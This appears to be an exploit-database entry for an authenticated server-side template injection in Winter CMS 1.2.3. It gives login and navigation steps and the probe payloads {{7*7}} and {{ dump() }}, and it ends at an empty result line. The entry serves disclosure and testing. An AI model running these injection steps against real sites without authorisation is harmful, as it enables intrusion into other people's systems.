Exploits / Vulnerability Discovered : 2024-03-16 |
Type : webapps |
Platform : php
This exploit / vulnerability Winter cms 1.2.3 serverside template injection (ssti) (authenticated) is for educational purposes only and if it is used you will do on your own risk!
1 ) Login with admin cred and click CMS > Pages field > Plugin components >
https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup
2 ) Write SSTI payload : {{7*7}}
3 ) Save it , Click Priview :
https://demos6.demo.com/WinterCMS/demo/plugins
4 ) You will be see result :
49
Payload :
{{ dump() }}
Result :